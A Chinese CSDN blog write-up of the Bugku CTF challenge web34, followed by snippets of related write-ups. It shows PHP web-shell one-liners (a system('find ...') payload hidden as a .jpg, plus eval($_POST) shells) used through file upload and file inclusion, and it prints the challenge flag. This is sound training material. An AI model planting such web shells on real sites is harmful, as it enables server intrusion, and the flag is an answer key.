Bugku CTF web34(Web)

最新推荐文章于 2022-02-11 23:58:51 发布
最新推荐文章于 2022-02-11 23:58:51 发布
阅读量256 收藏 1
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ChaoYue_miku/article/details/114951357
版权

0、打开网页,查看源代码

注意注释内容:upload.php

1、打开upload.php文件

文件上传,又是有关木马传入类型的题

2、构造一句话木马,查询flag文件

<script language=php>system("find / -name flag*");</script>

先创建文本文档,再修改扩展名为.jpg

3、上传一句话木马并打开

发现有关flag的储存路径信息

4、打开flag所在路径

5、得到flag:flag{9abf7616b9bddac530fc785ef7a5f3e3}

ChaoYue_miku
关注
专栏目录
bugku web34 hint:文件包含
濯君
12-30 578
首先打开实验场景,发现什么也没有 查看源码,发现upload.php 进入该上传页面 <script language=php>system("find / -name flag*");</script> 将上面的代码写入文本,文本名修改为2.jpg 将2.jpg上传到服务器 浏览器访问URL http://114.67.246.176:17269/index.php?file=upload/202012301028412794.jpg 找到/flag,访问URL h.
BugKuCTF WEB
让我再浪一会 的博客
11-24 886
文章目录BugKuCTF WEB一、web2二、计算器三、web基础$_GET四、web基础$_POST五、矛盾六、web3七、域名解析八、你必须让他停下九、变量1十、web5十一、头等舱十二、网站被黑十三、管理员系统十四、web4十五、flag在index里十六、输入密码查看flag BugKuCTF WEB 平台地址 一、web2 进入网页,查看源代码,在其中找到flag 二、计算器 进入网页,根据题目可得知需要输入运算结果,但限制了输入的数字的个数,查看网页的JS代码,将 maxlength =
bugku-web34
baidu_39504221的博客
12-23 616
看到这个第一反应是文件包含 尝试包含index.php 看看源码 这里有文件包含与文件上传两个漏洞的话,岂不是可以直接上传图片马然后解析? 写一个一句话试一下 GIF89a <?php phpinfo(); eval($_POST['test']); ?> 包含的时候发现<?php ?>一头一尾不见了,应该是被替换了 那我们可以这样写 <script language="php"> phpinfo(); @eval($_POST['test']); <.
Bugku-WEB-web34
fallingskies
01-06 246
进入题目,观察URL,显然存在文件包含。参考文件包含漏洞https://www.jianshu.com/p/3514f0fd79f7 考虑使用php伪协议读取源码 php://filter/read=convert.base64-encode/resource=需要读取的文件代码内容 应该是被过滤了,== F12查看源码 提示有一个upload.php页面 是一个文件上传页面,加上存在文件包含,考虑使用图片马。 随便找一张图片,用记事本打开,写入一句话 上传成功后访问图片..
Bugku web34 文件包含
weixin_44522540的博客
02-24 246
二十九、web34 文件包含 点进去查看源码: 发现upload.php,访问,可以上传图片 将以下代码写入记事本,后缀改为.jpg,上传 <script language=php>system("find / -name flag*");</script> 上传成功,访问上传的图片,看到/flag文件 访问/flag文件得到flag ...
BugkuCTF web
weixin_45689999的博客
01-19 794
1.web2 先打开F12看看,很容易发现在注释里面有flag。 把flag后面内容输入即可。 2.计算器 发现是一道及其简单的计算题(要是手上没有计算器有些题比较难算的话,可以点击题目换一道蛤,但是怎么换答案都是两位数以上的),输入答案,发现只能输入一位数,打开F12 发现他可输入字符长度为1,双击修改成10等位数,再输入正确答案,flag就出现了。 3.web基础-GET变量参考以下网址了解_...
BugkuCTF练习题解——Web
qq_41739275的博客
08-24 6590
文章目录1.Web22.计算器3.Web基础$_GET4.Web基础$_POST5.矛盾6.Web37.域名解析8.你必须让他停下9.本地包含10.变量111.Web512.头等舱13.网站被黑14.管理员系统15.Web416.flag在index中17.输入密码查看flag18.点击100万次19.备份是个好习惯 1.Web2 打开链接之后是滑稽笑脸,好家伙,吓我一跳,还以为是大bug,然后也没有提示啥的 感觉有点无从下手???别急,打开页面源代码(检查元素也可)瞅瞅 注释部分就是flag了。 2.
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugkuctf web 部分wp(自己看得懂)
LJW_wenjingli7的博客
12-15 2517
1.本地管理员 进入网址,查源码,异常的一串n,拉进度条看 == 是base64,解出test123 ,像密码。 这种未知的系统一般要爆破,随便填账号密码,连接代理,打开bp 右键发到repeater,去掉cookie请求,用XXF伪造请求IP,(能考虑到管理员可能是admin,直接省略改名)改user=admin,发送即可 **XXF: X-Forwarded-For:(HTTP的请求端真实的IP) 如题中的:X-Forwarded-For:127.0.0.1 XFF注入..
CTF|BugkuCTF-WEB解题思路
这里是一处长期不更新的博客
06-15 1977
截止至练习题【login4】,仅提供解题思路。 WEB2 按F12直接可得flag 计算器: 直接按F12,将maxlength修改,输入正确结果即可得到flag web基础$_GET URL输入:http://123.206.87.240:8002/get/?what=flag web基础$_POST 使用hackbar工具,按F12,打开Post data,传递what=flag。 矛盾 这里是使用is_numeric遇到%00截断的漏洞,这里构造 http://120.24.86.145:8002.
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
com.tencent.mobileqq_82
12-04
com.tencent.mobileqq_82 apk file ,just to install qq app
QQ文件下载后保存路径
chuyaju8969的博客
06-01 1万+
QQ文件下载后保存路径 : :/storage/emulated/0/Android/data/com.tencent.mobileqq/Tencent/QQfile_recv/ 转载于:...
bugku web32 文件上传
濯君
12-30 1736
打开实验,发现是文件上传 只能上传图像,不能上传PHP文件,那应该是寻找漏洞上传PHP文件 PHP文件里写入一句话木马 <?php @eval($_POST[caidao]);?> 使用burp抓包,不断尝试发现发现需要修改的地方有三个,一个是http head里的 Content-Type: multipart/form-data; multipart中的部分字母改成大写的。 第二个是文件的的Content-Type: application/octet-stream,改成image/j.
FileUriExposedException: file:///storage/emulated/0/Android/data/com.skyrin.bingo/cache/app/app.apk
热门推荐
ajiong314
07-03 21万+
安卓在app更新的时候file parseuri 报错FileuriExposedException:.................exposed beyond app through Intent.getData(); 执行下面代码报错的 Intent intent = new Intent(); intent.addCategory(Intent.CATEGORY_DEFAULT);...
android.os.FileUriExposedException: file:///storage/emulated/0/Android/data/com.xygame.apps/cache/IM...
dengranshao4955的博客
08-16 6万+
调用系统拍照时报错: android.os.FileUriExposedException: file:///storage/emulated/0/Android/data/com.xygame.apps/cache/IMG1120583907.tmp exposed beyond app through ClipData.Item.getUri() ...
QQ文件路径,QQ图片保存地址
weixin_49493329的博客
03-16 7万+
手机文件管理默认是0那层开始==/storage/emulated/0== /Android/data/com.tencent.mobileqq/Tencent/QQfile_recv/ QQ视频保存地址 /storage/emulated/0/ Android/data/com.tencent.mobileqq/Tencent/MobileQQ/shortvideo/ 其实基本上,QQ保存的文件都在/storage/emulated/0/Android/data/com.tencent.mobileqq/
CTFBugku web4
weixin_41607190的博客
09-30 481
那就直接看看先 看到的是这个 &lt;body&gt; &lt;div style="display:none;"&gt;&lt;/div&gt; &lt;form action="index.php" method="post"&gt; 看看源代码?&lt;br&gt; &lt;br&gt; &lt;script&gt; var p1
CTF 每日一题 Day42 [BJDCTF2020]这是base?
ChaoYue_miku的博客
02-11 3237
题目名称:[BJDCTF2020]这是base?? 题目类型:Crypto 题目来源:BUUCTF 题目描述:听说这题是rsa的续集 注意:得到的 flag 请包上 flag{} 提交
BugkuCTF 字符?正则?
最新发布
08-11
BugkuCTF 是一个CTF(Capture The Flag)比赛平台,提供了一系列的网络安全挑战题目供参赛者解决。在这个平台上,参赛者需要利用自己的技术和知识,寻找并利用目标系统中的漏洞,获取相应的flag来得分。 关于字符和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ChaoYue_miku

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值